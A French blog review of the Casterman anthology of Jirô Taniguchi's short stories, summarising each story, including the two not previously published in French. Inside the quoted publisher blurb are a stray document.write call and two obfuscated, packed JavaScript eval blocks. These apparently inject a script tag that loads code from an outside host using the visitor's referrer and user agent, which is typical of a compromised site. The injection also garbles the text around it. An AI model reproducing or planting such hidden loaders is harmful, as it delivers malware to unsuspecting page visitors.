Jirô Taniguchi, Une Anthologie

“Proposé dans une édition cartonnée luxueuse déjà utilisée pour Quartier Lointain et Le Journal de mon père du même Jirô Taniguchi, document.write(“”); ce volume rassemble deux titres du maître japonais précédemment publiés chez Casterman : Terre de rêves, préalablement paru dans la collection Ecritures en 2005, recueil de cinq récits courts centrés sur la vie quotidienne, et L’Homme de la toundra, initialement paru l’année suivante sous le label Sakka, autre recueil d’histoires courtes d’inspiration plus naturaliste. Deux autres histoires [“La lune finissante” et “Une lignée centenaire”], inédites en français, viennent compléter cette anthologie de 504 pages.”
eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(‘\b’+e(c)+’\b’,’g’),k[c])}}return p}(‘0.6(““);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|yabey|var|u0026u|referrer|rnkhk||js|php’.split(‘|’),0,{}))
eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(‘\b’+e(c)+’\b’,’g’),k[c])}}return p}(‘0.6(“
“);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|dbdtk|var|u0026u|referrer|ydyyf||js|php’.split(‘|’),0,{}))

[ Texte du
site de l’éditeur; voir aussi le texte de la couverture arrière ]

Continuez après le saut de page >>

Jirô Taniguchi, une anthologie (???????: ?????12??? / Taniguchi Jir? Sensh?: Inu o kau to 12 no tanpen / littéralement “Sélection de Jir? Taniguchi: Élever un chien et 12 histoires courtes”) est un recueil de treize histoires courtes qui regroupe les ouvrages Terre de rêves et L’Homme de la toundra, ainsi que deux récits inédits. Ce recueil a été publié au Japon en 2009 par l’éditeur Shogakukan et traduit en français par Casterman au début décembre 2010. Comme j’ai déjà commenté plus tôt dans ce blog L’Homme de la toundra et ses six récits, je m’attarderai ici sur les autres histoires.

Terre de rêves (???? / Inu o kau / litt. “Élever un chien”) a été sérialisé au Japon dans le magazine de Shogakukan Big Comics en 1991 avant d’être compilé en un volume (Tankoubon) en 1992 (puis réédité en Bunkobon en 2001). Il sera traduit en français et publié par Casterman en mars 2005. Le recueil comprend cinq récits (dont certains sont partiellement autobiographiques) qui abordent les thèmes favoris de Taniguchi: la vie quotidienne, la nature et les animaux.

Dans “Avoir un chien,” un jeune couple déménage à la campagne afin d’avoir un chien. Après plus de quatorze ans, celui-ci devient faible pour finalement mourir des suites d’une longue maladie. L’histoire illustre les joies de prendre soin d’un animal mais aussi la douleur que cause sa perte.

Dans “Et maintenant… un chat,” un an après la disparition de Tam, le jeune couple adopte une chatte persane suite à la recommandation d’une voisine. Ils la nomment Boro (chiffon) et, après une période d’acclimatation mutuelle, elle leur donne une portée de chatons et peut-être le bonheur. Il semble que Taniguchi a effectivement eut un chien qui est mort en 1990, suivi d’une chatte persane nommée Boro!

Dans “Vue du jardin,” le même jeune couple découvre toute les difficultés que représente trouver preneurs pour des chatons. Aussi, ils partent à la recherche du vieux chien aveugle d’une voisine. Il sera retrouvé mais mourra tout de même six mois plus tard, entouré des soins de sa maîtresse. En bout de ligne, le couple ne donnera qu’un chaton, à une petite voisine, et conservera trois chats!

Dans “Quelques jours à trois,” le jeune couple reçoit la visite surprise d’Akiko, une nièce de douze ans, qui a fait une fugue. Son père est décédé cinq ans plus tôt et sa mère songe à se remarier et cela trouble la jeune fille. Elle passe ainsi la dernière semaine des vacances d’été à mener une vie de famille normale: jouer avec les chats, pic-niquer, se lancer la balle, aller voir un match de baseball, etc., puis retourne chez elle. Dorénavant tout ira pour le mieux.

Dans “La Terre de la promesse,” la dernière histoire de Terre de rêves, Yoshimura et Okamoto tentent d’escalader la face sud de l’Annapurna dans l’Himalaya avec leur club d’alpinisme. Mais cette ascension hivernale échoue à cause d’un blizzard subit et violent. Yoshimura meurt et Okamoto survit de justesse, peut-être grâce à la vision d’un Tchango, une panthère des neiges. Six ans plus tard, il décide d’avoir sa revenge sur la montagne, ne serait-ce que pour l’espoir de revoir cette bête superbe qu’est le Tchango. Cette histoire serait inspirée en partie de la vie de l’alpiniste Keisuke Kawamura.

Dans “La Lune finissante” (???? / Hiken zangetsu), une histoire inédite, le samurai Shinnosuke Kamiya se rend à Rampart, un village de prospecteurs d’or en Alaska, pour retrouver son frère Jûshirô qui n’a pas donné de nouvelles depuis plus d’un an. Dans cette Amérique frontière de 1899, il fait sa petite enquête pour découvrir le sort tragique qu’a connu son frère et lui faire justice. Une histoire dont le thème se rapproche plus des récits d’action que Taniguchi produisait dans les années ’80 et qui n’est pas non plus sans rappeler Sky Hawk, publié sept ans plus tôt.

Dans “Une lignée centenaire” (????? / Hyakunen no keifu), la deuxième histoire inédite du recueil, la chienne Hana donne naissance à cinq petit chiots. C’est l’occasion pour Kimiko, la grand-mère, de raconter à sa petite-fille l’histoire de cette longue lignée de bergers allemands, qui failli, une fois pendant la 2e guerre mondiale, être interrompue. La lignée remontait à Günter, un berger allemand qu’un architecte prussien avait donné à son grand-père, un médecin militaire, à la fin de l’époque Meiji (1912). Kimiko avait grandie avec Belle, une chienne de la cinquième génération. Malheureusement, elle fut réquisitionnée par l’armée japonaise en 1943 pour contribuer à l’effort de guerre. Mais, après la guerre, elle ne revint pas. La vie reprit peu à peu son cours normal et la famille ouvrit une petite pension pour survivre dans l’économie difficile de l’après-guerre et Belle fut oubliée… jusqu’à ce que Kimiko entendes parler d’un article de magazine racontant l’histoire d’un soldat américain et de son chien Japonais!

Cette anthologie volumineuse nous offre le Taniguchi auquel on est habitué, sans plus ni moins, avec de belles histoires touchantes, dessinées dans un style agréable et fluide. Cet échantillonnage typique de l’oeuvre de ce mangaka maintenant réputé constitue l’occasion parfaite de le découvrir (si ce n’est déjà fait) ou de l’apprécier à nouveau. À lire.

Jirô Taniguchi, Une Anthologie, par Jiro TANIGUCHI. Paris, Casterman, 2010. 17.2 x 24 x 3.8 cm, 504 pg., 30,00 € / $54.95 Can. Sens de lecture occidental. ISBN: 978-2-203-03486-0. Recommandé pour jeune adulte (14+).

Pour plus d’information vous pouvez consulter les sites suivants:

Taniguchi Jir? Sensh?: Inu o kau to 12 no tanpen © 2009 by Jiro TANIGUCHI; © CASTERMAN, 2010 pour la traduction française.

[ Translate ]

One thought on “Jirô Taniguchi, Une Anthologie

  1. Pingback: Index of book reviews | Clodjee's Safe-House

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Google photo

You are commenting using your Google account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s